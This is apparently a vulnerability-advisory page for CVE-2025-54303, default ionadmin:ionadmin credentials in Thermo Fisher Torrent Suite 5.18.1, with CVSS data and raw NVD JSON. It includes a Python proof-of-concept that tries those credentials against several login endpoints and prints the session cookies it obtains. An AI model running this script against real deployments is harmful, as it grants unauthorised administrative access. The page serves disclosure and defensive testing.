Security Vulnerability Report
CVE-2025-54303 CVSS 9.8 CRITICAL

Published: 2025-12-04 15:15:59
Last Modified: 2025-12-16 21:00:14

Description

The Thermo Fisher Torrent Suite Django application 5.18.1 has weak default credentials, which are stored as fixtures for the Django ORM API. The ionadmin user account can be used to authenticate to default deployments with the password ionadmin. The user guide recommends changing default credentials; however, a password change policy for default administrative accounts is not enforced. Many deployments may retain default credentials, in which case an attacker is likely to be able to successfully authenticate with administrative privileges.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thermofisher:torrent_suite_software:5.18.1:*:*:*:*:*:*:* - VULNERABLE
Thermo Fisher Torrent Suite Django application <= 5.18.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-54303 PoC - Thermo Fisher Torrent Suite Default Credentials
# Target: Thermo Fisher Torrent Suite Django application <= 5.18.1
# Vulnerability: Default credentials (ionadmin:ionadmin)


def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2025-54303.
    Attempts to authenticate with default ionadmin credentials.
    """
    # Normalize URL
    if not target_url.startswith('http'):
        target_url = 'https://' + target_url
    if target_url.endswith('/'):
        target_url = target_url[:-1]

    # Default credentials
    username = 'ionadmin'
    password = 'ionadmin'

    # Try authentication via common Torrent Suite login endpoints
    login_endpoints = [
        '/api/v1/auth/login',
        '/auth/login/',
        '/admin/login/',
        '/login/',
        '/',
    ]

    print(f'[*] Target: {target_url}')
    print(f'[*] Attempting default credentials: {username}:{password}')

    for endpoint in login_endpoints:
        url = target_url + endpoint
        try:
            # Try form-based login
            response = requests.post(
                url,
                data={'username': username, 'password': password},
                timeout=10,
                verify=False,
                allow_redirects=True
            )
            # Check for successful login indicators.
            # Caveat: words such as 'admin' or 'session' also appear on a Django
            # login form that rejected the credentials, so a 200 response with
            # one of these markers is only a heuristic, not proof of a valid
            # login; confirm by checking for an authenticated session cookie.
            if response.status_code in [200, 302] and any(
                indicator in response.text.lower()
                for indicator in ['admin', 'dashboard', 'torrent', 'logout', 'session']
            ):
                print(f'[+] VULNERABLE! Authenticated successfully via {endpoint}')
                print(f'[+] Status code: {response.status_code}')
                print(f'[+] Session/Cookie: {response.cookies.get_dict()}')
                return True
        except requests.exceptions.RequestException as e:
            print(f'[-] Error accessing {endpoint}: {e}')
            continue

    print('[-] Could not authenticate with default credentials.')
    print('[-] Target may not be vulnerable or may use different login mechanism.')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve_2025_54303_poc.py <target_url>')
        print('Example: python cve_2025_54303_poc.py https://torrent-suite.example.com')
        sys.exit(1)
    target = sys.argv[1]
    check_vulnerability(target)
```

References

https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf (Product, Release Notes)
https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf (Vendor Advisory)
https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html (Product)

Weakness: CWE-1392 (Use of Default Credentials)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-54303",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-04T15:15:58.633",
    "lastModified": "2025-12-16T21:00:13.787",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Thermo Fisher Torrent Suite Django application 5.18.1 has weak default credentials, which are stored as fixtures for the Django ORM API. The ionadmin user account can be used to authenticate to default deployments with the password ionadmin. The user guide recommends changing default credentials; however, a password change policy for default administrative accounts is not enforced. Many deployments may retain default credentials, in which case an attacker is likely to be able to successfully authenticate with administrative privileges."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1392"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:thermofisher:torrent_suite_software:5.18.1:*:*:*:*:*:*:*",
                "matchCriteriaId": "C9D40EC2-7E68-4166-9ECF-431E4294CB97"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```